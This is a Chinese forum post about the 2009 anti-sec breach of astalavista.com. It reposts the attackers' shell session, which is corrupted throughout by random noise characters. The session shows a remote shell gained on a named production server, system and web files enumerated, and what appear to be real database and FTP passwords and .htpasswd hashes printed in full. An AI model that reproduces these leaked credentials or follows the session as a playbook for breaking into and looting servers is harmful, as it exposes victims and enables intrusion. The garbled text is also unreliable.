里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。% F/ y! C+ v6 k: P0 f7 [% T
8 ^3 x1 ~9 |% E4 J4 g8 D+ h[root@front3 ~]# curl -I litespeedtech.com
% o4 n& [; P3 Q$ THTTP/1.1 200 OK
% Q5 u7 }- i2 [% z5 F* \; X$ ODate: Fri, 05 Jun 2009 22:54:51 GMT
1 T$ V& u* Q( }! h' p: rServer: LiteSpeed
8 g9 m& i7 P( S* d0 [/ k1 z7 C7 ^1 a& M( {" a6 j' x
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-# i+ }3 m9 n* M4 Y; b$ r
( B6 V6 H5 n+ p( ]$ G2 c7 o+ U
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
$ d! b& J8 q' l/ S) y1 t$ `' e1 L3 Y0 ~3 u( B
: g& w- z4 y5 O8 V% ?* ~' y; ^/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ ! {/ Q- V* I3 o: `+ R, F: S
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
- X7 b3 J; V! D! j% {' L- w/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \. \/ }# B; f1 o; y' L' x; e7 a2 J- _
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /4 r& {' B2 g, `1 q4 g
\/ \/ \/ \/ \/ \/ \/2 r+ R- g% T7 Q7 q) }
The Hacking & Security Community
3 R# w# _* B: @& i7 ^[+] Founded in 1997 by a hacker computer enthusiast1 X1 z, l: x& k' F5 ?
[-] Exposed in 2009 by anti-sec group
: ]/ P5 M. m0 B+ Y7 Z9 k. _6 z& [. }# f+ ~9 f5 B4 q
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:; ]5 l! i, M$ x- Q+ S, c
>> 03. Who’s behind the site?
* f$ t y3 ?# e( Y9 r; S( V/ Y>>
- u/ I' u& R" j0 t0 D>> A team of security and IT professionals, and a countless number of contributors from all over the world.$ } o& w& B7 j9 {/ x+ a
: K' Y& C% B# Y" n( N) }3 B; L2 o
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
) y; _; ^1 w! ?) Y4 O>>4 `" U" a$ `( u- J1 \; H2 f
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and z' M- `( E2 N9 Q# }1 U8 ]
military institutions.( W* A' x/ F" b# g( W
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information./ Z9 f6 g/ m1 W3 @/ ^+ l( F) I
7 D$ s' u, w3 q4 {- O8 z3 f
Why has Astalavista been targeted?/ h8 T) p- Q; O
. o; A0 [+ i3 E1 P2 NOther than the fact that they are not doing any of this for the “community” but Q1 Y; e/ C6 { }9 y) m- O
for the money, they spread exploits for kids, claim to be a security community
5 P( D: D5 C* c6 E8 [2 b7 b+ u0 ](with no real sense of security on their own servers), and they charge you $6.66
" b: r a) w: Lper months to access a dead forum with a directory filled with public releases
9 p" Y' f1 {6 k, [/ r6 n) ?and outdated / broken services.2 P7 x% R9 P# b1 w) X" |. o
6 v. _. M6 U) M# L4 h% @! v
We wanted to see how good that “team of security and IT professionals” really is." a6 p' A8 [2 e- L( S
% Q l7 K8 q! m
Let’s begin.
/ `9 c- H u1 S1 _' ?7 \7 S$ F P2 }1 ^! I
anti-sec:~# ./g0tshell astalavista.com -p 801 I3 E. y ^3 G: [6 U
[+] Connecting to astalavista.com:80
5 A2 H& _3 ? w9 }[+] Grabbing banner…
: }7 p# H3 u# i6 G# t" ULiteSpeed
- a- p! Q% `4 M% |4 _[+] Injecting shellcode… t2 x/ E$ Y7 r( k# L& r9 g
[-] Wait for it, V, K* n8 c. z# F
( i! m, A' e- M8 T9 F[~] We g0tshell9 Q: R( y, |" C- {, J
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux" ~) s) G! A* b1 J" l, z; D" |
ID: uid=100(apache) gid=500(apache) groups=500(apache)9 |$ Y2 ~" I7 Y, x' S/ V
a" e' K; o, k9 w- u4 t5 esh-3.2$ cat /etc/passwd
, ^7 ?' G; ?* M1 ^6 g. hroot:x:0:0:root:/root:/bin/bash
9 b! K/ f% @6 Q$ m7 l1 w8 ybin:x:1:1:bin:/bin:/sbin/nologin
4 T8 {( ]: J+ i% }0 Edaemon:x:2:2:daemon:/sbin:/sbin/nologin
- l! B" ~/ O2 e& X9 L( q* r) |adm:x:3:4:adm:/var/adm:/sbin/nologin! I. K) }+ v* Y4 b: J1 l( X& D; |
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
& ^+ @$ Q) m! j- Wsync:x:5:0:sync:/sbin:/bin/sync
4 r3 z9 s8 _1 V& Q# Fshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
0 e& k8 D- j J- e0 L* i; i2 X, bhalt:x:7:0:halt:/sbin:/sbin/halt5 r! ]. D+ G3 F' X& \- ~1 ]
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin- o% D( z3 T3 K" A' n% e$ `6 W
news:x:9:13:news:/etc/news:
0 J- n# E, s: g/ `* }uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
, x4 D: u+ m2 D0 T- _operator:x:11:0 perator:/root:/sbin/nologin
6 F. w% P" G1 y t. fgames:x:12:100:games:/usr/games:/sbin/nologin% A# G/ h4 d9 c
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin) [; p; ~5 G- |0 ~( Z& F: m
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin) x2 O" t! b( ?6 {/ s3 h. N
nobody:x:99:99:Nobody:/:/sbin/nologin
! W/ L4 w! r+ d# u' D" orpm:x:37:37::/var/lib/rpm:/sbin/nologin
. ^, g2 ?2 {4 b( _- y! T, ?: Gdbus:x:81:81:System message bus:/:/sbin/nologin+ c' T( ]4 ?% T8 m' ]" U
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin+ x" U) v9 @, e& k/ ]
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
E1 [% P) p+ L/ Dsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin9 n9 Z7 s6 q5 @- z+ F( x, i
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin6 w5 l: {5 \9 V; k; s' |
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin( C2 L3 s9 N& G: Q0 c
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin+ M H% w- b$ e. ?! |
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
, J2 w2 z8 T6 L- s8 Enfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin! K( i' E8 [% J8 a
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
5 F7 ?! c; [8 S( V( q+ M( qpcap:x:77:77::/var/arpwatch:/sbin/nologin0 R* n5 \ P, t4 o
named:x:25:25:Named:/var/named:/sbin/nologin, T! n( Q6 L- N% x$ H9 I( K; ]+ K
apache:x:100:500::/var/www:/bin/false
; X) u) Z9 f) _( z' odiradmin:x:101:101::/usr/local/directadmin:/bin/bash
* c- S( X4 N5 ^) o$ G4 ]mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
7 @2 `4 g _/ q! C5 c+ a8 t s$ ywebapps:x:500:501::/var/www/html:/bin/bash5 E7 u/ V8 m# s, s
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash1 S/ b2 d7 T g; a- ~# ]
admin:x:501:502::/home/admin:/bin/bash
% T1 D+ `: s' _/ I% C( Hjon:x:502:503::/home/jon:/bin/bash, A) y; a5 m( x: J; v
com:x:503:504::/home/com:/bin/bash# T" @. s7 n0 j9 R7 E2 t9 e
ntp:x:38:38::/etc/ntp:/sbin/nologin0 M8 L/ Z4 }' o- g
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin9 S7 y1 M8 L4 j$ Q8 P
astanet:x:504:505::/home/astanet:/bin/bash
+ t1 U& t m) |2 \- yavahi:x:70:70:Avahi daemon:/:/sbin/nologin6 I' @) }& @4 X# d3 x
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin* y7 ^ N" s2 `* b8 Y
2 `# s5 L" @4 G1 P7 e" N: t
sh-3.2$ cat /etc/hosts
# d3 W) u2 l( X( w# Do not remove the following line, or various programs* w o4 E5 N2 e+ @
# that require network functionality will fail.* ]9 i* c' f" {4 o
127.0.0.1 localhost.localdomain localhost
O1 @& S( P; |1 _& D& r! b::1 localhost6.localdomain6 localhost6
& c2 J* h6 I# j: _" @80.74.154.172 asta1.astalavistaserver.com
- O3 U# K1 d/ I9 Y0 Z. S5 A4 c r: z$ J
sh-3.2$ pwd3 F" ~; A- n, y8 f R6 |7 P% f! x- Q
/home/com/public_html
9 R2 w8 H6 b/ \) J8 H0 t& M& }
2 b: F& n8 U/ N/ wsh-3.2$ ls -la
2 y$ }9 c- m: G% wtotal 18460
. x" h' P8 `) V9 qdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
8 X, t7 N% F: ~3 Jdrwx–x–x 11 com com 4096 Jun 25 2008 ..
0 F. L. |7 d: e6 z" L5 D l5 Ndrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin' r* S' z3 S6 i! k# [
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
& f. O" W8 ^$ r i7 W" mdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
) P( J* N" J# @5 v) udrwxrwxrwx 2 com com 4096 May 19 00:50 config
4 i, m' B) w4 m* Y& odrwxr-xr-x 2 com com 4096 Mar 20 11:05 core. u0 h1 O5 A# _
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules" Q7 e1 s; e$ k% @2 k5 `. k4 c
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
# u! V' ]$ F9 a/ M4 e fdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo1 y0 c0 ~0 T8 u5 g2 l, p
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
2 N1 `8 r& t% g3 _4 u-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php) x" M, o, {0 C5 g
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
+ R7 ~) B/ B. j; q3 N/ odrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor7 K- S- n/ U) V- ~4 Q6 \
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
2 d- N/ u, \- ?) X: n- t+ [drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
3 ~) ?+ I; w& p1 c2 Q& I9 X-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess( @) q7 [2 Z, G) z- L
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak- Q5 I$ ]& T( Y% z
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak6 h2 X: l, R: T0 {# \ o, f0 X
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool; J2 m/ }0 J: b$ `, B3 W
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
9 D+ T3 b- P& y+ b-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
& g% A+ c& r5 H. jdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
+ |6 X5 V$ F! [2 T) f2 {drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
. ^4 M) p# Z$ r \6 G: rdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
( H* S0 q3 c# F7 f- D4 H" g# M$ vdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
* e( Q1 a0 J1 H, ldrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
* U: a, ]' j3 _- E/ F" H2 y' y# zdrwxr-xr-x 34 com com 4096 May 28 16:30 modules+ t, z2 W& w- D) Z
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin. R3 S- D! K$ k
drwxrwxr-x 22 com com 4096 May 28 17:06 _new+ E* a% u2 x* i: v2 G. d
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
5 A' R: k2 Q& B/ b8 ^1 U$ F7 Mdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
8 |( U! l. H) tdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy, q/ N; n& W; C# ]3 A1 n
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt! y: v. u0 A" Z2 O% X8 O
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
0 _! `* U5 f0 O8 Q9 |-rw-r–r– 1 com com 223 Mar 30 15:32 test.php, O0 t" ]7 U4 X. V) [. c: k/ e: U
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes3 C: D1 h6 _5 U1 N. }! E9 E! A4 d
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp5 `" Q+ S. E9 I; f: n# F4 l
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
1 `3 o( _2 y; `- m/ H& [3 C/ X+ F* ` ?! z, V( v# m2 f5 K
sh-3.2$ head -20 index.php! j* y {- X# N' M, j
<?php
9 G0 T& k1 _5 H' Z1 T
- g' F/ }% g$ p/**
3 |# b3 Q2 Q" q" l& ?1 R3 U* The main page for the CMS
0 i( X* B" K3 t- N. ]# w: ?* T* @copyright CONTREXX CMS - COMVATION AG5 e3 c, z" r' ]4 w: V
* @author Comvation Development Team
* Y9 Q4 C2 ?! B- b* @version v1.0.9.10.1 stable$ h% T5 y2 k0 j( A& U
* @package contrexx" g2 A- M9 n! A9 ]
* @subpackage core' d! r; C' f0 ?4 O* A0 C( R# k
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage# y6 V% c+ W& x! Q0 G' c
* @since v0.0.0.07 [6 I& d9 G8 R
* @todo Capitalize all class names in project
6 O7 t |" D( f% _0 x* @uses /config/configuration.php
5 ^8 T- p" V7 T: D& P* @uses /config/settings.php* \. {* J9 D, x4 O8 A8 X
* @uses /config/version.php# r z* k, x- ^% `
* @uses /core/API.php( y5 m; y, D$ Q0 K3 d m$ v
* @uses /core_modules/cache/index.class.php- v2 O7 M( I9 L" \5 {6 R
* @uses /core/error.class.php4 `/ k0 c# O) f B
* @uses /core_modules/banner/index.class.php
5 q3 G4 F+ n% [+ Z" _! E, _5 N* @uses /core_modules/contact/index.class.php
0 O3 p/ J" T. v7 e' z. A4 Y5 Q' w a8 [4 j9 U; s8 D0 S( Z ]
sh-3.2$ cd config/
& @! O! [- `9 Q" S# b) Jsh-3.2$ ls -la2 U5 O# X3 B% L
total 32; k! V2 q8 i! y: \
drwxrwxrwx 2 com com 4096 May 19 00:50 .
0 G* U+ I! @6 u- }drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
' Z0 g# P) H; b0 F- W, B" V8 |. p; F) U-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php4 S1 N/ j7 D5 x. ~, R# k; u
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
+ H- H u* g: i# M) _4 {/ M2 _-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php; D: w3 F3 y* r/ K
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php. h1 y' Z. m7 s' b# s9 f+ t0 ?, l+ ]
( @# F4 W! l! b# k" D
sh-3.2$ cat configuration.php# L0 x: I+ ]) S, r) f
[snip]$ y3 ?% [7 l; ~& Q1 u7 {8 G
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost2 x% c5 N! x F( B2 G3 o/ n- K
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name: P0 u% D. {% W$ M
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix9 K* {: r8 R8 a& C$ d2 R% |
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
2 `% n/ h# v$ N4 e$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password" C% z) ^6 L: D
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
6 w% _( X% U" v5 V2 n2 ~$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
+ F- A1 d. P. [8 U4 t$ w( a. V[snip]
% X) t u( _4 ~( A4 i; j: z' j1 F$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
7 b' y* K6 W6 `$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode1 U% R P. U* A& @. V4 P
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost: H( h) J, p: l1 p; u
$_FTPCONFIG['port'] = 21; // Ftp remote port, Z9 X2 |9 n9 {: M$ x' J! S, k$ x
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username j; F6 z8 j5 u+ G8 p1 y
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password: m7 a8 Y; \* {* J |( K" {6 z
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
: D' r& s* q( E( j. E0 x) J2 N; ~% r4 C" o/ J$ B* o+ B
sh-3.2$ cd .. ^, ], B M3 J$ g) l: T2 p
sh-3.2$ cd dvd/0 w. `! Y- G/ b$ ]- v ]
sh-3.2$ ls -la# ^5 d7 g) m3 d+ N! K
total 2913780
, b$ z) `, {) q! Vdrwxr-xr-x 2 com com 4096 Sep 9 2008 .
7 ^. u' u4 ]# l$ F3 kdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
7 s5 ]4 D" W. ~" h-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
: G* g& M1 v" B-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
8 b: ^8 X0 \, B- N% `0 K-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
6 k, r- H; t( G, l' W-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess: R1 Z% D3 ]9 _
4 b: {; u6 o! C& g4 a4 D! ?; ]
sh-3.2$ cat .htaccess
2 s2 ]+ @" t! s' E2 kauthType Basic5 ?* C. t/ `# H6 v6 }$ l
authName DVD
% y. f/ T# w! pauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
]- M5 f+ Q3 d, g1 Z% Urequire valid-user* a/ \% Y) M1 P- @5 ~: X- ~8 Q
0 l* V" T( ?; x: w B
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd% ^0 {- d( t4 w5 I, m) v; Y7 U
DVDdownload:CRD8cuY6.MPT6
8 H. M6 z- Z6 C4 W- hDVDdownload2:CR8a36.wluFMg9 B. h; f* o9 _3 _" m" X4 @2 L
. {/ W% [3 [0 L$ L& N
sh-3.2$ cat test.php% q4 Z0 u# ~! S! ~2 d
<?php
3 w3 H" i& ]9 O) ~$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;) R; C6 ]# J. o1 ?( i6 u
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
& k9 L# N0 y7 A# r5 `( l( x0 ^; Uecho $url;
( E% h# Z3 o6 I?>
$ `5 A2 z4 G- a8 k5 j7 R
) f* z. S' r4 n+ r. n+ z7 m6 [8 _sh-3.2$ cd modifications/ \0 a! C- b: \1 Z- }) p* K' e
sh-3.2$ ls -la( `) R$ r- r, w$ q9 H) j
total 32
8 ?3 |! x9 j! u, g" ]8 O; fdrwxr-xr-x 8 com com 4096 May 11 12:48 .& b z) E) d. C& v5 Q& ]
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
* O: x U/ y7 Y! i/ d' ldrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng- ]3 \5 s! `) j9 Q9 h0 @( b
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
, b' p6 m* u0 N7 O% i! e1 _drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools6 j6 F n) ~# A' @! U6 y
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
0 j4 b) d! N% V0 \; edrwxr-xr-x 2 com com 4096 Feb 2 19:33 search/ I5 `+ _" ?6 U) m* [* _6 T
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp1 p+ P Q8 h2 L2 Z! S# w3 U3 O
% I& s; V# _- p: `6 \
sh-3.2$ ls -R7 E7 E; t) w% R3 j x4 l
.:5 C; f+ O9 e- X" N
com_avtng cronjobs onlinetools pjirc search _tmp0 g' v2 V/ D* U
9 o0 _6 @" a6 _7 V: h( D./com_avtng:; o' X+ H( z8 K$ F8 b8 y- p
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
. w0 y. {' y' N6 U2 E2 _: U! z2 L' ^6 r) l P
./com_avtng/scripts:% I8 P. V2 Z# S2 O8 T+ Y
popunder.js
; {+ r3 [1 `, I! O, a; ?( L" |# j7 x7 Y2 u
./cronjobs:
+ R/ G: H0 ^' X- `exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp) P% f8 E+ T( }8 h
0 X/ g' M- e& d" I' ^
./cronjobs/tmp:. ^; |$ {" P. T& c' n9 G: f. u" p
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
3 f8 E8 H7 O$ ]3 d. X; | t
0 S0 F9 ] f! ~ k, ]/ o: J% _./onlinetools:
f. [3 u" ~! Zindex.php. z% {6 Y3 T* V/ `! C$ E: X
: x( k- `$ j6 \4 K9 s# g0 w./pjirc:
/ A; U# k' Z' W" X; `2 v7 R' X1 Ha_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt1 \7 ~. @& M; w8 X r2 I- w
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
8 l8 g5 I+ J+ I9 L G s, zbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd5 B& o* Z s% b
3 f- Z& j: L8 p5 W
./pjirc/img:" K: f( t$ K6 ~# T1 { B H6 @
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
- y' X+ `3 a+ t# i0 t' D$ O7 Earbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif ( a# u$ i% y( F# K
verre-eau.gif3 L2 G- d g* F
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif + C& ^$ u' Y& }% @9 K l) V
verre-vin.gif' X9 V, P) @* b
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif4 m) _2 W2 v5 C4 f9 @
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
: H9 e7 w" i2 U( D8 f
t" z# c4 G" N/ J1 e. `2 V./pjirc/snd:. V; A9 w3 X$ ^0 P
bell2.au ding.au! K( M w( A$ r/ B; ]7 g
9 m8 g" |$ } C# y+ R./search:3 t( d- d4 ~# G+ N. v' p6 K
searchEngines.php search.php( V7 [. h( q w
9 L2 C: X4 Y7 V3 x7 f
./_tmp:
/ X- M) Z/ a0 pdefaultPorts.php defaultPorts.txt. {$ Q* _6 l/ C8 M( k0 x
+ `: E4 [& V6 E* w& ^8 dsh-3.2$ cd cronjobs/ j0 E w) j, p$ Q! {5 w
sh-3.2$ cat exploits.php
4 [' x7 w5 {0 h4 I) o[snip]
5 E9 \. \% k9 u6 \. k+ I: b$categories = array();4 v- R# i* T) Z
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
" i1 ~" r/ `# v! f# q7 m) S$expolits = file($milw0rmFile);/ c" W( S" p( b$ ?- k
$comExploits = array();+ Y5 n( K! H# \& l$ g
[snip]4 k& y2 u! |3 z; m3 H# M
// manage data3 g2 k7 ~- `# Y) h# U! f4 L0 a# l: J/ T
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
, Y! K% u8 q; X8 v
3 i, C! H+ W- _. }! i // get path and title
$ a) F. c( ]# [) u8 r1 F0 ? $expolits[$x] = trim($expolits[$x]);
3 \ I, Q8 j4 I2 T0 ~1 X $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
3 F1 w4 I7 f# \0 f1 D9 P $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
: D1 @$ t5 F8 e( C; g4 [' o9 @9 N+ Y4 S) c2 t* L5 y
// check if file exists
* d' q$ v! d8 W+ D, \( n if (file_exists($path)) {
2 `) Z Y3 H( s' c& Q
% x4 p$ m, y. V# U7 V2 m $text = file_get_contents($path);
# v+ f; `6 e p% x3 M; K
; S8 b3 E5 p* Y& o( H0 s // get content and date
/ `1 a" e; ^. b" P8 k //$text = htmlspecialchars($text, ENT_QUOTES);
: {' v B [0 q $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″)); ?7 F( x7 U; Y/ g" y. @
if ($tmptext != ”) {* n) e8 X1 H3 |1 S
$text = $tmptext;
& D& u Q( b0 P6 ?- r } else {
2 L1 v% V3 d5 o4 a! Z j $text = addslashes(htmlentities($text, ENT_QUOTES));
6 w6 d& q* U0 N l' c }
: u0 Z8 W4 D% q5 f( X& b $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
) z0 F/ M% B7 n" ?, P $tmp = explode('-', $date);
1 c: b+ H$ V3 w7 H; u $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));; w3 U' [3 i6 n1 s
$cat = getCategory ($path);1 {6 `: h- ]$ u. T7 N$ @& Z" _
$ext = pathinfo(basename($path));
2 f: c( y+ U7 J1 {7 W* U $ext = $ext['extension'];% V# \# z7 D3 Q
$qStr = ”
1 y$ s* Y. x4 W e8 J. Y SELECT `id`
' k, g% f, ?4 ?% w8 e7 Y+ W FROM `contrexx_module_exploits`0 z2 D( A/ y; e) X0 C
WHERE `title` = ‘” . $title . “‘
4 d' h ` c5 y1 {/ `) [- ? AND `date` = ‘” . $date . “‘# W. J: G' P. m8 J, g) V3 _" s2 i
“;
* ?! X2 T* U; S( p echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;5 }3 B5 C. Y1 ]# w
$q = $_objDB->query($qStr);! i* _% X, J1 q2 K$ o
S, v' g( I; q1 d: n if ($q->numRows() == 0) {
6 S% V4 A. K& M1 X
( x2 g$ j; R. \1 |, r& ?+ [9 B // prepare array0 H+ E& b' W/ c7 c% i r9 z
$comExploits[$x]['date'] = $date;
! L1 P: M8 \! G) I' O $comExploits[$x]['title'] = $title;
) e7 P, n* K5 y $comExploits[$x]['author'] = ‘milw0rm’;
1 c# J( a4 T7 k! e) R8 u $comExploits[$x]['text'] = $text;
( u2 ?- `, {& G$ P* t $comExploits[$x]['source'] = $ext;
9 L. p4 G4 R4 n: A% ^( q/ ~ $comExploits[$x]['url1'] = ”;5 ?9 f/ d8 ]6 v6 N- z" p( J9 _
$comExploits[$x]['url2'] = ”;
( i( R+ r; D4 W, ~, p: ^" T $comExploits[$x]['catid'] = $cat;3 F8 T& p U) a3 V n6 z
$comExploits[$x]['lang'] = ‘2′;0 u/ x5 W2 b. o5 A
$comExploits[$x]['userid'] = ‘12′;5 t1 ^! E0 n2 p0 ]; B
$comExploits[$x]['startdate'] = ‘0000-00-00′;
% r. a% _" b3 ]4 D4 S2 y $comExploits[$x]['enddate'] = ‘0000-00-00′;
$ z2 I" H2 I' t: N" F$ s: V $comExploits[$x]['status'] = ‘1′;
0 z# G' W* {: T. `! s2 a' ^ $comExploits[$x]['changelog'] = $date;
" @ ~: p1 z2 \: @ i0 _. Z4 O" }4 D4 J" E- p
}
3 |7 O' a; q1 P& m* o- N) y[snip]1 Y- I8 h* o( x' b' z5 @5 |
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
$ O& y1 I$ k/ C( L<rss version=”2.0″>
, j9 L5 [; c5 C0 K, i( ]" N W <channel>
+ m! C% E! k. u <title>ASTALAVISTA.com - Exploits</title>+ v: R- E. f. [0 {# l! l
<link>http://www.astalavista.com/exploits</link>+ L3 U% i1 ]; l( M( g4 @
